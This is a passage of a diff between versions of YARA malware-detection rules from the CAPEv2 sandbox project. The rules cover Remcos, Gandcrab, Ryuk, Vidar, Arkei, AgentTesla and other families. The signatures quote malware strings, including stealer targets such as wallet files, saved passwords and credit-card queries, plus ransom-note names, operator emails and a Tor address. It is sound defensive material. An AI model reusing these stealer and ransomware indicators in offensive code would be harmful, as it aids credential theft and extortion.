-		$decode2 = {8B D9 81 FF FF FF FF 7F 0F [2] 00 00 00 C7 43 ?? 0F 00 00 00 83 FF 10 73 1A 57 FF 75 ?? 89 7B ?? 53 E8 [4] 83 C4 0C C6 04 1F 00 5F 5B 5D C2 08 00}
-		$c2 = {FF 75 30 83 3D [4] 10 BA [4] B9 [4] 0F 43 15 [4] 83 3D [4] 10 0F 43 0D [4] E8 [4] A3}
+		$ip_port = {FF D5 6A 0A 68 [4] 68 [4] 89 E6 50 50 50 50 40 50 40 50 68 [4] FF D5}
+		$socket = {6A 00 6A 04 56 57 68 [4] FF D5 [0-5] 8B 36 6A 40 68 00 10 00 00 56 6A 00 68}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		all of them
 }
-rule CAPE_Doomedloader : FILE
+rule CAPE_Remcos : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
+		description = "Remcos Payload"
 		author = "kevoreilly"
-		id = "88436e71-360e-5719-989f-24e71591ebe0"
-		date = "2024-07-25"
-		modified = "2024-07-25"
+		id = "f77295ca-02d5-5b2c-80b8-b6566610bff8"
+		date = "2022-05-10"
+		modified = "2022-05-10"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/DoomedLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "54a5962ef49ebf987908c4ea1559788f7c96a7e4ea61d2973636e998a0239c77"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Remcos.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "38142e784ad437d9592353b924f74777bb62e5ed176c811230a2021a437d4710"
 		score = 75
-		quality = 70
+		quality = 68
 		tags = "FILE"
-		cape_options = "clear,bp0=$anti*-4,action0=setzeroflag,sysbp=$syscall+7,count=0,procdump=2"
-		packed = "914b1b3180e7ec1980d0bafe6fa36daade752bb26aec572399d2f59436eaa635"
+		cape_type = "Remcos Payload"
 
 	strings:
-		$anti = {48 8B 4C 24 ?? E8 [4] 84 C0 B8 [4] 41 0F 45 C6 EB}
-		$syscall = {49 89 CA 8B 44 24 08 FF 64 24 10}
+		$name = "Remcos" nocase
+		$time = "%02i:%02i:%02i:%03i"
+		$crypto1 = {81 E1 FF 00 00 80 79 ?? 4? 81 C9 00 FF FF FF 4? 8A ?4 8?}
+		$crypto2 = {0F B6 [1-7] 8B 45 08 [0-2] 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 ?? ?? FF FF 30 06 47 3B 7D 0C 72}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and ( $name ) and ( $time ) and any of ( $crypto* )
 }
-rule CAPE_Mysterysnail
+rule CAPE_Gandcrab : FILE
 {
 	meta:
-		description = "MysterySnail anti-sandbox bypass"
+		description = "Gandcrab Payload"
 		author = "kevoreilly"
-		id = "dfeb820a-3101-5588-8348-3b62a6900538"
-		date = "2021-10-16"
-		modified = "2021-10-16"
+		id = "0082e8c9-952e-508c-a438-4e17b8031864"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/MysterySnail.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "9402dbbbfdd286e2309ee83fc08194f70f73657a3a4e3785dfbcb564dbee86a8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Gandcrab.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "354ed566dbafbe8e9531bb771d9846952eb8c0e70ee94c26d09368159ce4142c"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp0=$anti+62,action0=skip,count=0"
+		tags = "FILE"
+		cape_type = "Gandcrab Payload"
 
 	strings:
-		$anti = {F2 0F 10 [3] 66 0F 2F 05 [4] 76 0A 8B [3] FF C0 89 [3] B9 5B 05 00 00 FF 15 [4] E8 [4] 89 [3] 8B [3] 8B [3] 2B C8 8B C1 3B [3] 7E 16}
+		$string1 = "GDCB-DECRYPT.txt" wide
+		$string2 = "GandCrabGandCrabnomoreransom.coinomoreransom.bit"
+		$string3 = "action=result&e_files=%d&e_size=%I64u&e_time=%d&" wide
+		$string4 = "KRAB-DECRYPT.txt" wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5A4D and any of ( $string* )
 }
-rule CAPE_Vidar : FILE
+rule CAPE_Cryptoshield : FILE
 {
 	meta:
-		description = "Vidar Payload"
-		author = "kevoreilly,rony"
-		id = "9e4e797f-880e-54eb-ad44-caad0ec5683c"
-		date = "2023-04-21"
-		modified = "2023-04-21"
+		description = "Cryptoshield Payload"
+		author = "kevoreilly"
+		id = "a7b60a0d-7d46-59c9-8273-ee23bae3fbbc"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Vidar.yar#L1-L22"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "5d4c030536ed41cf4e0dcb77b2fe4553d789ee2b8095a4b3e050692335a8709d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Cryptoshield.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "46064b4c69cb1af01330c5d194ef50728e0f0479e9fbf72828822935f8e37ac6"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Vidar Payload"
-		packed = "0cff8404e73906f3a4932e145bf57fae7a0e66a7d7952416161a5d9bb9752fd8"
+		cape_type = "Cryptoshield Payload"
 
 	strings:
-		$decode = {FF 75 0C 8D 34 1F FF 15 ?? ?? ?? ?? 8B C8 33 D2 8B C7 F7 F1 8B 45 0C 8B 4D 08 8A 04 02 32 04 31 47 88 06 3B 7D 10 72 D8}
-		$xor_dec = {0F B6 [0-5] C1 E? ?? 33 ?? 81 E? [0-5] 89 ?? 7C AF 06}
-		$wallet = "*wallet*.dat" fullword ascii wide
-		$s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii wide
-		$s2 = "screenshot.jpg" fullword ascii wide
-		$s3 = "\\Local State" fullword ascii wide
-		$s4 = "Content-Disposition: form-data; name=\"" fullword ascii wide
-		$s5 = "CC\\%s_%s.txt" fullword ascii wide
-		$s6 = "History\\%s_%s.txt" fullword ascii wide
-		$s7 = "Autofill\\%s_%s.txt" fullword ascii wide
-		$s8 = "Downloads\\%s_%s.txt" fullword ascii wide
+		$a1 = "CRYPTOSHIELD." wide
+		$a2 = "Click on Yes in the next window for restore work explorer" wide
+		$a3 = "r_sp@india.com - SUPPORT"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 6 of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Eternalromance : FILE
+rule CAPE_Masslogger : FILE
 {
 	meta:
-		description = "EternalRomance Exploit"
+		description = "MassLogger"
 		author = "kevoreilly"
-		id = "34035076-9dda-5e32-bd0b-d0257a96329b"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "0743421a-36f7-5b7c-859f-b461511151cb"
+		date = "2020-11-24"
+		modified = "2020-11-24"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/EternalRomance.yar#L1-L33"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "5390fae3e2411a715cdc965df8648c0c4c511d53d5f76031714f1b784b58eb0d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/MassLogger.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "c8d82694810aafbdc6a35a661e7431e9536035e2f7fef90b9359064c4209b66c"
 		score = 75
-		quality = 68
+		quality = 70
 		tags = "FILE"
-		cape_type = "EternalRomance Exploit"
+		cape_type = "MassLogger Payload"
 
 	strings:
-		$SMB1 = "Frag"
-		$SMB2 = "Free"
-		$session7_32_1 = {2A 02 1C 00}
-		$session7_64_1 = {2A 02 28 00}
-		$session8_32_1 = {2A 02 24 00}
-		$session8_64_1 = {2A 02 38 00}
-		$session7_32_2 = {D5 FD E3 FF}
-		$session7_64_2 = {D5 FD D7 FF}
-		$session8_32_2 = {D5 FD DB FF}
-		$session8_64_2 = {D5 FD C7 FF}
-		$ipc = "IPC$"
-		$pipe1 = "atsvc"
-		$pipe2 = "browser"
-		$pipe3 = "eventlog"
-		$pipe4 = "lsarpc"
-		$pipe5 = "netlogon"
-		$pipe6 = "ntsvcs"
-		$pipe7 = "spoolss"
-		$pipe8 = "samr"
-		$pipe9 = "srvsvc"
-		$pipe10 = "scerpc"
-		$pipe11 = "svcctl"
-		$pipe12 = "wkssvc"
+		$name = "MassLogger"
+		$fody = "Costura"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $SMB* ) ) and $ipc and ( any of ( $session* ) ) and ( any of ( $pipe* ) )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Rhadamanthys_1
+rule CAPE_Ryuk : FILE
 {
 	meta:
-		description = "Rhadamanthys Loader"
+		description = "Ryuk Payload"
 		author = "kevoreilly"
-		id = "4683ef43-7397-5546-ae54-b4c000518182"
-		date = "2023-09-18"
-		modified = "2023-09-18"
+		id = "594bbb8d-1f85-5a01-a864-ac2d95c45bf9"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Rhadamanthys.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "f71bee3ef1dd7b16a55397645d16c0a20d1fdd3bf662f241c0b11796629b11ff"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Ryuk.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "b4463993d8956e402b927a3dcfa2ca9693a959908187f720372f2d3a40e6db0c"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "Rhadamanthys Loader"
+		tags = "FILE"
+		cape_type = "Ryuk Payload"
 
 	strings:
-		$rc4 = {88 4C 01 08 41 81 F9 00 01 00 00 7C F3 89 75 08 33 FF 8B 4D 08 3B 4D 10 72 04 83 65 08 00}
-		$code = {8B 4D FC 3B CF 8B C1 74 0D 83 78 04 02 74 1C 8B 40 1C 3B C7 75 F3 3B CF 8B C1 74 57 83 78 04 17 74 09 8B 40 1C 3B C7 75 F3 EB}
-		$conf = {46 BB FF 00 00 00 23 F3 0F B6 44 31 08 03 F8 23 FB 0F B6 5C 39 08 88 5C 31 08 88 44 39 08 02 C3 8B 5D 08 0F B6 C0 8A 44 08 08}
-		$cape_string = "cape_options"
+		$ext = ".RYK" wide
+		$readme = "RyukReadMe.txt" wide
+		$main = "InvokeMainViaCRT"
+		$code = {48 8B 4D 10 48 8B 03 48 C1 E8 07 C1 E0 04 F7 D0 33 41 08 83 E0 10 31 41 08 48 8B 4D 10 48 8B 03 48 C1 E8 09 C1 E0 03 F7 D0 33 41 08 83 E0 08 31 41 08}
 
 	condition:
-		2 of them and not $cape_string
+		uint16( 0 ) == 0x5A4D and 3 of ( $* )
 }
-rule CAPE_Formbook
+rule CAPE_Smokeloader
 {
 	meta:
-		description = "Formbook Payload"
+		description = "SmokeLoader Payload"
 		author = "kevoreilly"
-		id = "3389c0a7-eb86-5465-8a14-63f812d257db"
-		date = "2023-10-13"
-		modified = "2023-10-13"
+		id = "d3ca7c8a-01dc-5174-9928-ee278b6cb107"
+		date = "2024-11-12"
+		modified = "2024-11-12"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Formbook.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "63ee4dd6fe5ed2a3e5ee88ba7de48d2c9e0024961a550d0fdb68891c9885e05e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/SmokeLoader.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "779e2ac213e5ced7bc06e6208826b65cf8fc3113a69ede6408b84055542fa76d"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "Formbook Payload"
-		packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522"
-		packed = "2379a4e1ccdd7849ad7ea9e11ee55b2052e58dda4628cd4e28c3378de503de23"
+		cape_type = "SmokeLoader Payload"
 
 	strings:
-		$remap_ntdll = {33 56 0? 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
-		$rc4dec = {F7 E9 C1 FA 03 8B C2 C1 E8 1F 03 C2 8D 04 80 03 C0 03 C0 8B D1 2B D0 8A 04 3A 88 8C 0D [4] 88 84 0D [4] 41 81 F9 00 01 00 00 7C}
-		$decrypt = {8A 50 01 28 10 48 49 75 F7 83 FE 01 76 14 8B C7 8D 4E FF 8D 9B 00 00 00 00 8A 50 01 28 10 40 49 75 F7}
-		$string = {33 C0 66 39 01 74 0B 8D 49 00 40 66 83 3C 41 00 75 F8 8B 55 0C 8D 44 00 02 50 52 51 E8}
-		$mutant = {64 A1 18 00 00 00 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B E5 5D C3}
-		$postmsg = {8B 7D 0C 6A 00 6A 00 68 11 01 00 00 57 FF D6 85 C0 75 ?? 50}
+		$rc4_decrypt64 = {41 8D 41 01 44 0F B6 C8 42 0F B6 [2] 41 8D 04 12 44 0F B6 D0 42 8A [2] 42 88 [2] 42 88 [2] 42 0F B6 [2] 03 CA 0F B6 C1 8A [2] 30 0F 48 FF C7 49 FF CB 75}
+		$rc4_decrypt32 = {47 B9 FF 00 00 00 23 F9 8A 54 [2] 0F B6 C2 03 F0 23 F1 8A 44 [2] 88 44 [2] 88 54 [2] 0F B6 4C [2] 0F B6 C2 03 C8 81 E1 FF 00 00 00 8A 44 [2] 30 04 2B 43 3B 9C 24 [4] 72 C0}
+		$fetch_c2_64 = {74 ?? B? E8 03 00 00 B9 58 02 00 00 FF [5] 48 FF C? 75 F0 [6-10] 48 8D 05}
+		$fetch_c2_32 = {8B 96 [2] (00|01) 00 8B CE 5E 8B 14 95 [4] E9}
 
 	condition:
 		2 of them
 }
-rule CAPE_Arkei : FILE
+rule CAPE_Azer : FILE
 {
 	meta:
-		description = "Arkei Payload"
-		author = "kevoreilly, YungBinary"
-		id = "18363a5b-46f3-5d11-9bc6-a91f81b49706"
-		date = "2025-01-10"
-		modified = "2025-01-10"
+		description = "Azer Payload"
+		author = "kevoreilly"
+		id = "4bda70c2-3cd9-543f-92f4-886b7dd899a1"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Arkei.yar#L1-L50"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "296e420880d8d2f24424d0411e7ef4939e18147689557512f410da48498a44c9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Azer.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "48bd4a4e071f10d1911c4173a0cd39c69fed7a3b29eb92beffe709899f4cefa5"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Arkei Payload"
+		cape_type = "Azer Payload"
 
 	strings:
-		$string1 = "Windows_Antimalware_Host_System_Worker"
-		$string2 = "Arkei"
-		$string3 = "Bitcoin\\wallet.dat"
-		$string4 = "Ethereum\\keystore"
-		$v1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide
-		$v2 = "/c taskkill /im " fullword ascii
-		$v3 = "card_number_encrypted FROM credit_cards" ascii
-		$v4 = "\\wallet.dat" ascii
-		$v5 = "Arkei/" wide
-		$v6 = "files\\passwords." ascii wide
-		$v7 = "files\\cc_" ascii wide
-		$v8 = "files\\autofill_" ascii wide
-		$v9 = "files\\cookies_" ascii wide
-		$loaded_modules = {
-            64 A1 30 00 00 00
-            8B 40 0C
-            8B 40 0C
-            8B 00
-            8B 00
-            8B 40 18
-            89 45 FC
-            8B 45 FC
-            8B E5
-            5D
-            C3
-        }
-		$language_check = {
-            FF 15 ?? ?? ?? ??
-            0F B7 C0
-            89 45 ??
-            81 7D ?? 3F 04 ?? ??
-            7F
-        }
-		$ext1 = ".zoo" ascii
-		$ext2 = ".arc" ascii
+		$a1 = "webmafia@asia.com" wide
+		$a2 = "INTERESTING_INFORMACION_FOR_DECRYPT.TXT" wide
+		$a3 = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $loaded_modules and $language_check and $ext1 and $ext2 ) or ( all of ( $string* ) or 7 of ( $v* ) ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Cerber : FILE
+rule CAPE_Varenyky : FILE
 {
 	meta:
-		description = "Cerber Payload"
+		description = "Varenyky Payload"
 		author = "kevoreilly"
-		id = "edf08795-cf54-5822-8bc4-35cfba0fe8e8"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "e01695fa-72a0-5d8e-86ab-8c909d28b8ec"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Cerber.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "16a8f808c28d3b142c079a305aba7f553f2452e439710bf610a06f8f2924d5a3"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Varenyky.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "602f1b8b60b29565eabe2171fde4eb58546af68f8acecad402a7a51ea9a08ed9"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Cerber Payload"
+		cape_type = "Varenyky Payload"
 
 	strings:
-		$code1 = {33 C0 66 89 45 8? 8D 7D 8? AB AB AB AB AB [0-2] 66 AB 8D 45 8? [0-3] E8 ?? ?? 00 00}
+		$onion = "jg4rli4xoagvvmw47fr2bnnfu7t2epj6owrgyoee7daoh4gxvbt3bhyd.onion"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and ( $onion )
 }
-rule CAPE_Xenorat
+rule CAPE_Oyster
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "jeFF0Falltrades"
-		id = "9708158d-06fc-5991-a084-df2bfe1d5c96"
-		date = "2024-10-09"
-		modified = "2024-10-09"
+		description = "Oyster Payload"
+		author = "enzok"
+		id = "29443d00-e3de-53fd-b617-df470a30e805"
+		date = "2024-05-30"
+		modified = "2024-05-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/XenoRAT.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "26f520fb69a52d05786fac0e9e38f5db9601da0a3e7768e00975a9684f3560ef"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Oyster.yar#L1-L19"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "8bae0fa9f589cd434a689eebd7a1fde949cc09e6a65e1b56bb620998246a1650"
+		logic_hash = "23ab1518712dbce8319b87785d7ffc0c2b61de82c2bbf533ebf0aae39ec33540"
 		score = 75
-		quality = 66
+		quality = 70
 		tags = ""
-		cape_type = "XenoRAT payload"
+		cape_type = "Oyster Payload"
 
 	strings:
-		$str_xeno_rat_1 = "xeno rat" wide ascii nocase
-		$str_xeno_rat_2 = "xeno_rat" wide ascii nocase
-		$str_xeno_update_mgr = "XenoUpdateManager" wide ascii
-		$str_nothingset = "nothingset" wide ascii
-		$byte_enc_dec_pre = { 1f 10 8d [4] (0a | 0b) }
-		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$start_exit = {(05 | 00) 00 00 00 2E 96 1E A6}
+		$content_type = {F6 CE 56 F4 76 F6 96 2E 86 C6 96 36 0E 0E 86 04 5C A6 0E 9E 2A B4 2E 76 A6 2E 76 F6 C2}
+		$domain = {44 5C 44 76 96 86 B6 F6 26 44 34 44}
+		$id = {44 5C 44 64 96 44 DE}
+		$ip_local = {44 5C 44 36 86 C6 F6 36 FA 0E 96 44 34 44}
+		$table_part_1 = {00 80 40 C0 20 A0 60 E0 10 90 50 D0 30 B0 70 F0 08 88 48 C8 28 A8 68}
+		$table_part_2 = {97 57 D7 37 B7 77 F7 0F 8F 4F CF 2F AF 6F EF 1F 9F 5F DF 3F BF 7F FF}
+		$decode = {0F B6 0? 8D ?? FF 8A [2] 0F B6 80 [4] 88 04 ?? 46 0F B6 C? 0F B6 80 [4] 88 4? 01 3B F7}
 
 	condition:
-		4 of them and #patt_config >= 5
+		4 of them
 }
-rule CAPE_Petya : FILE
+rule CAPE_Agent_Tesla
 {
 	meta:
-		description = "Petya Payload"
-		author = "kevoreilly"
-		id = "e581747c-c40f-5689-84b4-d55134b532f7"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "Detecting HTML strings used by Agent Tesla malware"
+		author = "Stormshield"
+		id = "5383994b-357d-539b-89b1-53be238f759d"
+		date = "2025-03-07"
+		modified = "2025-03-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Petya.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "f819261bb34f3b2eb7dc2f843b56be25105570fe902a77940a632a54fbe0d014"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AgentTesla.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "3945754129dcc58e0abfd7485f5ff0c0afdd1078ae2cf164ca8f59a6f79db1be"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Petya Payload"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$a1 = "CHKDSK is repairing sector"
-		$a2 = "wowsmith123456@posteo.net"
-		$a3 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" wide
+		$html_username = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii
+		$html_pc_name = "<br>PC&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii
+		$html_os_name = "<br>OS&nbsp;Full&nbsp;Name&nbsp;&nbsp;: " wide ascii
+		$html_os_platform = "<br>OS&nbsp;Platform&nbsp;&nbsp;&nbsp;: " wide ascii
+		$html_clipboard = "<br><span style=font-style:normal;text-decoration:none;text-transform:none;color:#FF0000;><strong>[clipboard]</strong></span>" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		3 of them
 }
-rule CAPE_Rcsession
+rule CAPE_Agenttesla : FILE
 {
 	meta:
-		description = "RCSession Payload"
+		description = "AgentTesla Payload"
 		author = "kevoreilly"
-		id = "841e6bd1-4f09-54dc-8dec-2e9423a34003"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "f7b930f1-cecb-5d80-809b-9503f282247a"
+		date = "2025-03-07"
+		modified = "2025-03-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/RCSession.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "ebd1e9e615a91c35b36332cad55519607323469df738cec4464288b45787630d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AgentTesla.yar#L19-L41"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "1bf9b26c4cf87e674ddffabe40aba5a45499c6a04d4ff3e43c3cda4cbcb4d188"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "RCSession Payload"
+		tags = "FILE"
+		cape_type = "AgentTesla Payload"
 
 	strings:
-		$a1 = {56 33 F6 39 74 24 08 7E 4C 53 57 8B F8 2B FA 8B C6 25 03 00 00 80 79 05 48 83 C8 FC 40 83 E8 00 74 19 48 74 0F 48 74 05 6B C9 09 EB 15 8B C1 C1 E8 02 EB 03 8D 04 09 2B C8}
-		$a2 = {83 C4 10 85 C0 74 ?? BE ?? ?? ?? ?? 89 74 24 10 E8 ?? ?? ?? ?? 6A 03 68 48 0B 00 00 56 53 57 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 18 85 C0 74 18 E8 ?? ?? ?? ?? 6A 03 68 48}
+		$string1 = "smtp" wide
+		$string2 = "appdata" wide
+		$string3 = "76487-337-8429955-22614" wide
+		$string4 = "yyyy-MM-dd HH:mm:ss" wide
+		$string6 = "webpanel" wide
+		$string7 = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:" wide
+		$string8 = "<br>IP Address&nbsp;&nbsp;:" wide
+		$agt1 = "IELibrary.dll" ascii
+		$agt2 = "C:\\Users\\Admin\\Desktop\\IELibrary\\IELibrary\\obj\\Debug\\IELibrary.pdb" ascii
+		$agt3 = "GetSavedPasswords" ascii
+		$agt4 = "GetSavedCookies" ascii
 
 	condition:
-		( any of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $string* ) or 3 of ( $agt* ) )
 }
-rule CAPE_Fareit : FILE
+rule CAPE_Agentteslav2 : FILE
 {
 	meta:
-		description = "Fareit Payload"
-		author = "kevoreilly"
-		id = "b3c4eb86-d104-5f31-afa4-5bf5f370f64e"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		description = "AgenetTesla Type 2 Keylogger payload"
+		author = "ditekshen"
+		id = "e60ecee4-0a97-56a1-b21e-47190f8cd1f8"
+		date = "2025-03-07"
+		modified = "2025-03-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Fareit.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "ed35391ffc949219f380da3f22bc8397a7d5c742bd68e227c3becdebcab5cf83"
